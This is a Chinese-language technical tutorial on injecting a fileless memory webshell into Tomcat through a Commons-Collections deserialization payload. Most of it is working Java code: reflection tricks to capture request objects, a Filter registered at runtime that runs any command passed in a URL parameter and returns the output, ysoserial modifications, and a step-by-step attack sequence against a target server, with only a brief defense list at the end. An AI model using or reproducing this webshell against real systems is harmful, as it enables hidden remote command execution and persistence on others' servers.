基于Tomcat的内存Webshell无文件攻击技术详解<\/h1>

0x00 技术背景<\/h2>
内存Webshell是一种驻留在服务器内存中的恶意程序，不写入磁盘文件，具有隐蔽性强、难以检测的特点。本文介绍的技术针对Tomcat容器，通过动态注册Filter实现无文件攻击，具有以下特点：<\/p>
完全内存驻留，不落地文件<\/li>
适用于Tomcat容器，不依赖特定Web框架<\/li>
可绕过Shiro等安全框架的防护<\/li>
支持命令执行回显<\/li> <\/ol>
0x01 技术原理<\/h2>

1.1 获取Request和Response对象<\/h3>
Tomcat处理HTTP请求时，会经过以下关键调用栈：<\/p>
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter
org.apache.catalina.core.ApplicationFilterChain.doFilter
org.apache.catalina.core.StandardWrapperValve.invoke
...
<\/code><\/pre>
关键点在于ApplicationFilterChain<\/code>类的internalDoFilter<\/code>方法：<\/p>
if<\/span> (<\/span>ApplicationDispatcher.<\/span>WRAP_SAME_OBJECT<\/span>)<\/span> {<\/span>
<\/span><\/span>    lastServicedRequest.<\/span>set<\/span>(<\/span>request);<\/span>
<\/span><\/span>    lastServicedResponse.<\/span>set<\/span>(<\/span>response);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>通过反射修改ApplicationDispatcher.WRAP_SAME_OBJECT<\/code>为true，并初始化lastServicedRequest<\/code>和lastServicedResponse<\/code>这两个ThreadLocal变量，可以在后续请求中获取Request和Response对象。<\/p>
1.2 动态注册Filter<\/h3>
传统方法直接通过ServletContext添加Filter会遇到问题，因为Tomcat运行时状态为STARTED<\/code>，不允许动态添加Filter。解决方案：<\/p>

通过反射修改StandardContext状态为STARTING_PREP<\/code><\/li>
添加自定义Filter<\/li>
恢复StandardContext状态为STARTED<\/code><\/li>
确保Filter在FilterChain的最前面执行<\/li>
<\/ol>
0x02 实现步骤<\/h2>
2.1 准备工作<\/h3>
创建两个关键类：<\/p>

TomcatEchoInject<\/code> - 用于初始化ThreadLocal变量<\/li>
TomcatShellInject<\/code> - 实现Filter接口的内存Webshell<\/li>
<\/ol>
2.2 TomcatEchoInject类<\/h3>
public<\/span> class<\/span> TomcatEchoInject<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 修改WRAP_SAME_OBJECT为true
<\/span><\/span><\/span><\/span>            Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.catalina.core.ApplicationDispatcher"<\/span>);<\/span>
<\/span><\/span>            Field f =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"WRAP_SAME_OBJECT"<\/span>);<\/span>
<\/span><\/span>            \/\/ 反射修改final字段
<\/span><\/span><\/span><\/span>            Field modifiersField =<\/span> f.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"modifiers"<\/span>);<\/span>
<\/span><\/span>            modifiersField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            modifiersField.<\/span>setInt<\/span>(<\/span>f,<\/span> f.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>            f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            if<\/span> (!<\/span>f.<\/span>getBoolean<\/span>(<\/span>null<\/span>))<\/span> {<\/span>
<\/span><\/span>                f.<\/span>setBoolean<\/span>(<\/span>null<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 初始化lastServicedRequest
<\/span><\/span><\/span><\/span>            c =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.catalina.core.ApplicationFilterChain"<\/span>);<\/span>
<\/span><\/span>            f =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedRequest"<\/span>);<\/span>
<\/span><\/span>            \/\/ 同上反射修改
<\/span><\/span><\/span><\/span>            f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            if<\/span> (<\/span>f.<\/span>get<\/span>(<\/span>null<\/span>)<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                f.<\/span>set<\/span>(<\/span>null<\/span>,<\/span> new<\/span> ThreadLocal());<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 初始化lastServicedResponse
<\/span><\/span><\/span><\/span>            f =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedResponse"<\/span>);<\/span>
<\/span><\/span>            \/\/ 同上反射修改
<\/span><\/span><\/span><\/span>            f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            if<\/span> (<\/span>f.<\/span>get<\/span>(<\/span>null<\/span>)<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                f.<\/span>set<\/span>(<\/span>null<\/span>,<\/span> new<\/span> ThreadLocal());<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ... 省略其他方法
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 TomcatShellInject类<\/h3>
public<\/span> class<\/span> TomcatShellInject<\/span> extends<\/span> AbstractTranslet implements<\/span> Filter {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 获取Request对象
<\/span><\/span><\/span><\/span>            Field f =<\/span> ApplicationFilterChain.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedRequest"<\/span>);<\/span>
<\/span><\/span>            f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            ThreadLocal t =<\/span> (<\/span>ThreadLocal)<\/span>f.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>            ServletRequest servletRequest =<\/span> (<\/span>ServletRequest)<\/span>t.<\/span>get<\/span>();<\/span>
<\/span><\/span>            
<\/span><\/span>            if<\/span> (<\/span>servletRequest !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                ServletContext servletContext =<\/span> servletRequest.<\/span>getServletContext<\/span>();<\/span>
<\/span><\/span>                StandardContext standardContext =<\/span> null<\/span>;<\/span>
<\/span><\/span>                
<\/span><\/span>                \/\/ 获取StandardContext
<\/span><\/span><\/span><\/span>                for<\/span> (;<\/span> standardContext ==<\/span> null<\/span>;<\/span> )<\/span> {<\/span>
<\/span><\/span>                    Field contextField =<\/span> servletContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>                    contextField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                    Object o =<\/span> contextField.<\/span>get<\/span>(<\/span>servletContext);<\/span>
<\/span><\/span>                    if<\/span> (<\/span>o instanceof<\/span> ServletContext)<\/span> {<\/span>
<\/span><\/span>                        servletContext =<\/span> (<\/span>ServletContext)<\/span>o;<\/span>
<\/span><\/span>                    }<\/span> else<\/span> if<\/span> (<\/span>o instanceof<\/span> StandardContext)<\/span> {<\/span>
<\/span><\/span>                        standardContext =<\/span> (<\/span>StandardContext)<\/span>o;<\/span>
<\/span><\/span>                    }<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                
<\/span><\/span>                if<\/span> (<\/span>standardContext !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                    \/\/ 修改状态以允许添加Filter
<\/span><\/span><\/span><\/span>                    Field stateField =<\/span> LifecycleBase.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"state"<\/span>);<\/span>
<\/span><\/span>                    stateField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                    stateField.<\/span>set<\/span>(<\/span>standardContext,<\/span> LifecycleState.<\/span>STARTING_PREP<\/span>);<\/span>
<\/span><\/span>                    
<\/span><\/span>                    \/\/ 添加自定义Filter
<\/span><\/span><\/span><\/span>                    Filter threedr3am =<\/span> new<\/span> TomcatShellInject();<\/span>
<\/span><\/span>                    FilterRegistration.<\/span>Dynamic<\/span> filterRegistration =<\/span> 
<\/span><\/span>                        servletContext.<\/span>addFilter<\/span>(<\/span>"threedr3am"<\/span>,<\/span> threedr3am);<\/span>
<\/span><\/span>                    filterRegistration.<\/span>setInitParameter<\/span>(<\/span>"encoding"<\/span>,<\/span> "utf-8"<\/span>);<\/span>
<\/span><\/span>                    filterRegistration.<\/span>setAsyncSupported<\/span>(<\/span>false<\/span>);<\/span>
<\/span><\/span>                    filterRegistration.<\/span>addMappingForUrlPatterns<\/span>(<\/span>
<\/span><\/span>                        EnumSet.<\/span>of<\/span>(<\/span>DispatcherType.<\/span>REQUEST<\/span>),<\/span> false<\/span>,<\/span> new<\/span> String[]{<\/span>"\/*"<\/span>});<\/span>
<\/span><\/span>                    
<\/span><\/span>                    \/\/ 恢复状态
<\/span><\/span><\/span><\/span>                    stateField.<\/span>set<\/span>(<\/span>standardContext,<\/span> LifecycleState.<\/span>STARTED<\/span>);<\/span>
<\/span><\/span>                    
<\/span><\/span>                    \/\/ 使Filter生效
<\/span><\/span><\/span><\/span>                    Method filterStartMethod =<\/span> StandardContext.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"filterStart"<\/span>);<\/span>
<\/span><\/span>                    filterStartMethod.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                    filterStartMethod.<\/span>invoke<\/span>(<\/span>standardContext,<\/span> null<\/span>);<\/span>
<\/span><\/span>                    
<\/span><\/span>                    \/\/ 将Filter移到第一位
<\/span><\/span><\/span><\/span>                    FilterMap[]<\/span> filterMaps =<\/span> standardContext.<\/span>findFilterMaps<\/span>();<\/span>
<\/span><\/span>                    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> filterMaps.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>
<\/span><\/span>                        if<\/span> (<\/span>filterMaps[<\/span>i].<\/span>getFilterName<\/span>().<\/span>equalsIgnoreCase<\/span>(<\/span>"threedr3am"<\/span>))<\/span> {<\/span>
<\/span><\/span>                            FilterMap filterMap =<\/span> filterMaps[<\/span>i];<\/span>
<\/span><\/span>                            filterMaps[<\/span>i]<\/span> =<\/span> filterMaps[<\/span>0<\/span>];<\/span>
<\/span><\/span>                            filterMaps[<\/span>0<\/span>]<\/span> =<\/span> filterMap;<\/span>
<\/span><\/span>                            break<\/span>;<\/span>
<\/span><\/span>                        }<\/span>
<\/span><\/span>                    }<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest servletRequest,<\/span> ServletResponse servletResponse,<\/span> 
<\/span><\/span>            FilterChain filterChain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        String cmd;<\/span>
<\/span><\/span>        if<\/span> ((<\/span>cmd =<\/span> servletRequest.<\/span>getParameter<\/span>(<\/span>"threedr3am"<\/span>))<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            \/\/ 执行命令并回显
<\/span><\/span><\/span><\/span>            Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>            BufferedReader bufferedReader =<\/span> new<\/span> BufferedReader(<\/span>
<\/span><\/span>                new<\/span> InputStreamReader(<\/span>process.<\/span>getInputStream<\/span>()));<\/span>
<\/span><\/span>            StringBuilder stringBuilder =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>            String line;<\/span>
<\/span><\/span>            while<\/span> ((<\/span>line =<\/span> bufferedReader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                stringBuilder.<\/span>append<\/span>(<\/span>line +<\/span> '\n'<\/span>);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            servletResponse.<\/span>getOutputStream<\/span>().<\/span>write<\/span>(<\/span>stringBuilder.<\/span>toString<\/span>().<\/span>getBytes<\/span>());<\/span>
<\/span><\/span>            servletResponse.<\/span>getOutputStream<\/span>().<\/span>flush<\/span>();<\/span>
<\/span><\/span>            servletResponse.<\/span>getOutputStream<\/span>().<\/span>close<\/span>();<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        filterChain.<\/span>doFilter<\/span>(<\/span>servletRequest,<\/span> servletResponse);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ... 省略其他方法
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.4 生成Payload<\/h3>
修改ysoserial工具，创建专门的Payload生成类：<\/p>

CommonsCollections11ForTomcatEchoInject<\/code> - 用于初始化ThreadLocal<\/li>
CommonsCollections11ForTomcatShellInject<\/code> - 用于注入内存Webshell<\/li>
<\/ol>
关键修改点：<\/p>
\/\/ 原代码
<\/span><\/span><\/span><\/span>final<\/span> Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>command[<\/span>0<\/span>]);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 修改为
<\/span><\/span><\/span><\/span>final<\/span> Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>null<\/span>,<\/span> TomcatEchoInject.<\/span>class<\/span>);<\/span>
<\/span><\/span>\/\/ 或
<\/span><\/span><\/span><\/span>final<\/span> Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>null<\/span>,<\/span> TomcatShellInject.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>0x03 攻击流程<\/h2>

第一步<\/strong>：使用CommonsCollections11ForTomcatEchoInject<\/code>生成Payload，发送到目标服务器，初始化ThreadLocal变量<\/li>
第二步<\/strong>：使用CommonsCollections11ForTomcatShellInject<\/code>生成Payload，发送到目标服务器，注入内存Webshell<\/li>
使用Webshell<\/strong>：访问任意URL，添加参数?threedr3am=command<\/code>执行系统命令并获取回显<\/li>
<\/ol>
0x04 防御措施<\/h2>

禁用危险的序列化功能<\/strong>：关闭不必要的反序列化入口<\/li>
升级依赖库<\/strong>：使用最新版本的commons-collections等库<\/li>
运行时防护<\/strong>：使用RASP等工具监控可疑的反射操作<\/li>
Filter白名单<\/strong>：限制动态注册Filter的能力<\/li>
状态监控<\/strong>：检测Tomcat状态的异常修改<\/li>
<\/ol>
0x05 技术总结<\/h2>
本技术通过以下关键点实现了Tomcat下的内存Webshell：<\/p>

利用反射修改Tomcat内部变量，获取Request\/Response对象<\/li>
通过状态欺骗实现运行时动态注册Filter<\/li>
调整Filter执行顺序确保优先执行<\/li>
结合反序列化漏洞实现无文件攻击<\/li>
<\/ol>
这种攻击方式隐蔽性强，防御难度大，需要从多个层面进行防护。<\/p>